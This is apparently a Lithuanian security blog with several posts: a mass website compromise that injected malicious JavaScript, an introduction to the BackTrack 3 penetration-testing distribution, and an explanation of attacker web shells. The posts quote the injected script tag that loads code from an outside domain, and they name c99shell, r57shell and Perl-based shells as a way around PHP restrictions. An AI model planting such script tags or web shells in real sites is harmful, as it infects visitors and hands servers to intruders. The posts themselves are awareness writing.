Atrodo, kad pasiekiau nerašymo blog’e rekordą. Į metų galą ir taip daug rašyti teko, tai prie šio tinklaraščio prisėsti tiesiog jau neprisiversdavau. Bet aš jau čia ir rašau. Dėkui, kad neišsilakstėt.

Kadangi baigėsi metai, tai visur visi pradėjo skelbti įvairius 2008 metų topus. Pats jokios statistikos nevedu, tad čia remsiuos kompanijos Bit9 informacija. Ką ta kompanija veikia? Jos pagrindinė veikla yra programų whitelist’inimas. T.y. daryti taip, kad įmonėse darbuotojai galėtų paleisti tik tas programas kurias jiems leidžiama paleisti ir jokios kitos improvizacijos su darbiniais kompiuteriais. Lietuvoje iki tokio lygio kol kas “priaugę” tik kai kurie bankai. Tokias paslaugas teikiančių yra ir daugiau, bet grižkim prie pažeidžiamiausių 2008 metų programų sąrašo.

Skaityti visą įrašą…

Pastaruoju metu internete įvyksta vis daugiau automatizuotų tinklalapių nulaužimų. Laužiama iš karto dideliais kiekiais. Pvz. po 10 000 vnt. iš karto. Ir nesirenkama kas laužiamas. Svarbu didelis kiekis išnaudojant tam tikrus šabloninius tinklalapių pažeidžiamumus. Atakos metu į tinklalapius įterpiamas papildomas kodas. T.y. puslapis šiek tiek patiuninguojamas. Tas tiuningas, tai yra JavaScript’as, kuris tinklalapio lankytojų sistemose ieško pažeidžiamumų ir tuos pažeidžiamumus bando išnaudoti. Pvz. jei turit neatnaujintą kokį nors Adobe Reader’į, seną QuickTime grotuvą ar Flash’o versiją, tai po apsilankymo tokiam nulaužtam puslapyje, kompiuteryje dar turėsit ir kokią nors papildomą žalingą programą. O Jūsų nuomonės apie tai niekas net ir neklaus. Po visų tokių masinių atakų, pažeisti puslapiai turėdavo žalingą kodą su Šanchajuje ar kur nors kitur Kinijoje registruotais domenais. Paskutinė ataka vyko balandžio mėn. ir į puslapius pridėdavo štai tokį kodą: <script src=http://www.nihaorr1.com/1.js></script>. Kiek iš skaitančių šį tinklaraštį nukentėjo nuo šios atakos? O kiek apie nukentėjusias įmones parašė spauda? Be problemų galim įvertinti kaipgi sekėsi lietuviškiems tinklalapiams. Aišku, kaip gi čia be google’o.

Tarp laimingųjų pateko ir Susisiekimo ministerija, ir policijos komisariatas, o pažiurėję žemiau rasite ir tinklalapius ministraspirmininkas.lt, bonumpublicum.lt, 5ci.lt, books.lt ir t.t. 5ci tai turbūt kiek puslapių turėjo, tai visus ir nulaužė. Tačiau nei vienas nesugebėjo net tyliai pasakyti ką nors panašaus į “Mieli mūsų tinklalapio lankytojai, nepykit, kad užkrėtėm Jus žalingom programom po Kinijos įsilaužėlių atakos. Nuo žalingų programų galite pasitikrinti taip ir va kaip. O mes prisipažįstame klydę ir kad tai daugiau nepasikartotų darysime taip ir va kaip.” ar kažkaip kitaip įspėti bei atsiprašyti savo lankytojų. O kur atsakomybė prieš kitus? Ypač iš valstybinių įstaigų? Na taip, juk geriau viską susitvarkyti tyliai, gal niekas nieko nepastebės. Bet google’as viską mato. Ir mes irgi matom. O dabar dar turim progą apie tai ir pakalbėti garsiai, ir dar per dantį patraukti…

Šiandien mane kaip reikiant sunervavo nezinau.lt su savo blogorama. Joje radau, kad bilietai į Blogin konferenciją jau pasibaigę. Kadangi šiandien pagaliau paaiškėjo, kad penktadienis man neužimtas, tai rytdieną planavau pradėti nuo bilieto pirkimo. Tai ką dabar rytoj ryte veikt? Ei, Blogin organizatoriai, kaip pirmo etapo blog’ų konkurso nugalėtojui galėtumėte kokį bilietą ir sukrapštyti. Žodžiu turiu problemą dabar gyvenime. Kur gauti bilietą?

Kad jau taip, tai pabūsiu šiandien blogas ir supažindinsiu Jus su linux live distribucija Backtrack 3. Kol kas tik beta. Bet jos autoriai sako, kad ne betoje bus tik didesnis suderinamumas su įranga.

Kam ši distribucija yra skirta? Kaip visuomet tokiais atvejais sakoma, kad tai priemonė skirta saugumo auditoriams. Taip taip. Ėmiau ir patikėjau iš karto. Jei priemonė skirta saugumo auditoriams, tai ji lygiai tiek pat skirta ir įsilaužėliams. Patį CD ar USB variantą galite atsisiųsti iš jų autorių tinklalapio http://www.remote-exploit.org/backtrack.html. Taigi, pasigaminus USB ar įsirašius CD iš karto gausit visą veikiančią operacinę sistemą su daugybe naudojimui beveik paruoštų (gali tekti kartais šiek tiek paderinti tinko nustatymus) programinių priemonių, skirtų įvairių sistemų analizei ir lauž… t.y. saugumo įvertinimui. Visos priemonės yra tvarkingai sugrupuotos atskirais meniu punktais pagal jų paskirtį.

Išsirenkat ko reikia ir naudojat. Jei audito metu prireiks greitai pasileisti apache ar tftpd tarnybas, tai jos naudojimui taip pat jau paruoštos ir tereikia paleisti atitinkamą meniu punktą. Didelių mygtukų maigytojus turiu įspėti, kad dažnai gali nepakakti pasirinkti priemonę, nurodyti sistemą ir paspausti mygtuką su užrašu “Go”. Norint išsiaiškinti ką priemonė daro arba kokia nauda iš jos rezultato, teks ir šiek tiek daugiau pasidomėti.

Be paruoštų naudojimui programinių priemonių čia yra ir visa kolekcija exploit’ų. T.y. nedidelių programėlių išnaudojančių įvairius pažeidžiamumus sistemose. Taip pat dar rasit ir įvairių dokumentų, priemonių programų analizei bei įsilaužimams tirti ir t.t. Visko daug, viskas iš karto įdiegta ir iš karto veikia. Bėda viena - reik mokėti tuo naudotis.

Be šio grafinės aplinkos meniu punkto, reikėtų atkreipti dėmesį ir į katalogą “/pentest”. Jame taip pat rasite daug įvairių priemonių.

Jei čia nerasite Jums reikiamos priemonės, kurią norėtumėte naudoti visą laiką kartu su kitomis, tai tokiu atveju tereikia sukurti savo modulį, kuriuo nesunkiai galėsite papildyti disko atvaizdą, o iš jo pasidaryti naują CD. Naudojantiems USB variantą pakaks reikiamą programą tiesiog įsidiegti.

Tokio tipo distribucijų yra pridaryta ir daugiau, tačiau šią laikau viena geriausių ir lanksčiausių. Taip pat šios distribucijos autoriai yra gyvas pavyzdys kaip reikėtų dirbti open source bendruomenėje. Prieš tai vieni kūrė panašios paskirties distribuciją Whax, o kiti - Auditor Security Collection. Viena distribucija stipresnė buvo vienose srityse, kita - kitose. Bet galiausiai abiejų distribucijų autoriai susijungė ir pradėjo daryti vieną. Produktas gavosi geras ir nemokamas. Vartokite tinkamai.

Jau anksčiau rašiau apie bandymus automatiniu būdu įterpinėti nutolusį programinį kodą. Ataka primityvi, bet vis gi… Ok, kas būna toliau, kai tokio bandymo atveju, per parametrą pavykstą tą kodą įterpti? Toliau būna bandoma paleisti WebShell’ą. WebShell - vartotojo sąsaja skirta valdyti serverį per naršyklę. Valdyti ne šiaip spaudžiojant pelę, bet tarsi per ssh, turint komandinę eilutę ar kitais būdais, kurie priklauso nuo situacijos. T.y. galimybės būna tokios pačios kaip normaliai prisijungus prie serverio. WebShell’ai būna geri ir blogi. Geri - skirti administratoriams jų sistemų priežiūrai. Tokių rasite daug per google, pvz. kad ir šis: http://www-personal.umich.edu/~mressl/webshell/. Norint juos paleisti, kartais reikia įdiegti papildomas bibliotekas serveryje. Blogi - serverio valdymo perėmimui po įsilaužimo. Pastarieji padaryti taip, kad visko serveryje diegti reikėtų kuo mažiau ir jų veikimui pakaktų standartinės serverio konfigūracijos. WebShell’as į serverį dedamas ir kitais būdais įsilaužus, ne tik aprašytuoju anksčiau, nes tai patogus būdas pasidaryti “atsarginį priėjimą”, jei netyčia serverio skylė butų užlopyta. Web’as yra ta terpė, kuri dažniausiai laisvai praeina pro visas apsaugos priemones, nes web’u visi naudojasi ir jam kelias paliktas atviras. Būtent dėl šios priežasties įsilaužėliai ir mėgsta tokius specializuotus WebShell’us kaip c99shell, remview ar r57shell.

Bet hakeriai nebūtų hakeriais, jei nebandytų ir vieni kitų išdurti. Atsisiųsdami tokį hakerišką WebShell’ą net ir pasižaidimui, būkite atsargūs. Dažnai jų kodas jau būna modifikuotas kitų arba pačių autorių parašytas taip, kad po WebShell’o paleidimo būtų pranešama apie tai, kur jis buvo paleistas. Netrukus po paleidimo galite sulaukti svečių, su kuriais turėsite dalintis serveriu. Todėl žiūrėkit iš kur tokį WebShell’ą imat arba peržvelkit jo programinį kodą ar ten nėra prirašyta ko nors per daug.Dabar pakalbėkim apie adminus. Jie tokius dalykus žinodami bando apsisaugoti nuo WebShell’ų. Kadanagi populiariausi blogi WebShell’ai yra kurti su PHP, tai dažniausiai visos apsaugos priemonės ties tuo ir pasibaigia. Bet jei imtumėm standartinį linux’inį serverį, kuriame veikia PHP tarnyba, tai dažniausiai tame pačiame serveryje rastumėm veikiančią Perl tarnybą, kuriai visiškai vienodai kokie yra PHP nustatymai. Jau pagavai kampą? Taip, jei neveikia su PHP kurtas WebShell’as dėl visokių jo veikimą ribojančių PHP konfigūracijos parametrų, tai niekas netrukdo į serverį įdėti su Perl kurto WebShell’o. Surinkit į google “perl webshell” ir gausi tokių krūvą. Paprasti dalykai turi būti sprendžiami paprastai. Šiam kartui tiek, o prie blogųjų WebShell’ų aš dar sugrįšiu.